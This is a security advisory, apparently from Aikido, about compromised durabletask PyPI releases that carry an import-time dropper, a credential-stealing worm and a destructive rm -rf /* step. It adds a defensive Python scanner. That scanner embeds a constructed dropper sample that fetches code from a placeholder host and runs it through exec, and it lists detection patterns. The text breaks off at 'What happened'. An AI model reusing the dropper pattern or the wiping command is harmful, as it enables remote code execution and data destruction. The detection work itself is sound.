By aikido.dev
Publication Date: 2026-05-19 00:00:00
We’ve identified three malicious versions of durabletask on PyPI (1.4.1, 1.4.2 and 1.4.3) that contain a dropper injected directly into the package’s Python source files. When a developer installs any of these versions and imports the library, the dropper silently fetches and executes a second-stage payload from a three-day-old C2 domain. Because the dropper runs at import time, no durabletask API has to be called: a test run, a REPL session or any tool that imports the module is enough to trigger it.
That second stage is a full-featured infostealer and worm. It harvests credentials from every major cloud provider, password manager, and developer tool it can find, encrypts the results with an attacker-controlled RSA key, and exfiltrates them to the C2 server. If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it’s inside Kubernetes, it propagates through kubectl exec. In other words, a single developer laptop or CI runner holding cloud or cluster credentials is enough for the worm to move into the rest of the environment. And if it detects Israeli or Iranian system settings, there’s a 1-in-6 chance it plays audio and then runs rm -rf /*.
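As an added example (this is not Aikido’s tooling and not code from the durabletask project), the Python script below does the two checks a practitioner would want right away: it looks up whether one of the three affected versions is installed, and it statically scans a package directory for the generic shape described above, module-level code that runs on import, pulls something from the network and hands it to exec/eval/compile. The exact source pattern of the real dropper is not known here, so the scan is a heuristic and its hits are triage leads, not proof. The sample sources embedded at the bottom are constructed for the demo; the URL in them is a placeholder, not the real C2 domain. It also assumes the import directory is named like the distribution (durabletask).

```python
"""Audit helpers for the durabletask PyPI incident.

Added example: not Aikido's tooling and not durabletask project code.
Assumption (not from the advisory): the real dropper's exact source pattern
is unknown here, so the scan flags the generic shape described in the
write-up, import-time (module-level) code that fetches from the network and
feeds the result to exec()/eval()/compile(). Expect some false positives.
"""
import ast
from importlib import metadata
from pathlib import Path

MALICIOUS_VERSIONS = {"1.4.1", "1.4.2", "1.4.3"}   # versions named in the advisory
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post"}  # bare call names
EXEC_CALLS = {"exec", "eval", "compile"}


def installed_version(dist_name="durabletask"):
    """Version string of an installed distribution, or None if absent."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


def is_malicious_version(version):
    return version in MALICIOUS_VERSIONS


def _call_name(node):
    """Bare function name of an ast.Call ('urlopen' for urllib.request.urlopen)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def find_import_time_dropper(source, filename="<module>"):
    """Return {'file', 'fetch_lines', 'exec_lines'} when module-level code both
    fetches from the network and executes a string; otherwise None.

    Function and class bodies are skipped (they only run when called), but
    try/if/with blocks at module level are walked, because that code runs the
    moment `import durabletask` happens, which is the behaviour described."""
    tree = ast.parse(source, filename)
    fetch_lines, exec_lines = set(), set()
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            name = _call_name(node)
            if name in FETCH_CALLS:
                fetch_lines.add(node.lineno)
            elif name in EXEC_CALLS:
                exec_lines.add(node.lineno)
    if fetch_lines and exec_lines:
        return {"file": filename, "fetch_lines": sorted(fetch_lines),
                "exec_lines": sorted(exec_lines)}
    return None


def scan_package_dir(pkg_dir):
    """Scan every .py file under pkg_dir; returns the list of findings."""
    findings = []
    for path in sorted(Path(pkg_dir).rglob("*.py")):
        try:
            hit = find_import_time_dropper(
                path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue  # not parseable by this interpreter; skip, do not import it
        if hit:
            findings.append(hit)
    return findings


def audit(dist_name="durabletask"):
    """Version pin check plus source scan of the installed package directory."""
    version = installed_version(dist_name)
    report = {"version": version, "bad_version": is_malicious_version(version),
              "findings": []}
    if version is not None:
        # Assumes the import package is named like the distribution.
        pkg_dir = Path(metadata.distribution(dist_name).locate_file(dist_name))
        if pkg_dir.is_dir():
            report["findings"] = scan_package_dir(pkg_dir)
    return report


# Constructed samples for the demo: NOT the real dropper, and the URL is a
# placeholder rather than the C2 domain from the advisory.
SAMPLE_CLEAN = """
import json

def load(payload):
    return json.loads(payload)
"""

SAMPLE_DROPPER = """
import urllib.request
try:
    _blob = urllib.request.urlopen("http://stage2.invalid/p").read()
    exec(compile(_blob, "<stage2>", "exec"))
except Exception:
    pass
"""

if __name__ == "__main__":
    print(audit())                                             # real install, if any
    print(find_import_time_dropper(SAMPLE_CLEAN, "clean.py"))  # None
    print(find_import_time_dropper(SAMPLE_DROPPER, "dropper.py"))
```

Run it in the same interpreter that would import durabletask (the one your project uses), since importlib.metadata only sees that environment. The scan never imports the package; it only parses source, which is the point when the thing you are checking executes on import.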
This does smell of more TeamPCP shenanigans, but we can’t be sure for now.
What happened
durabletask is a Python package for the…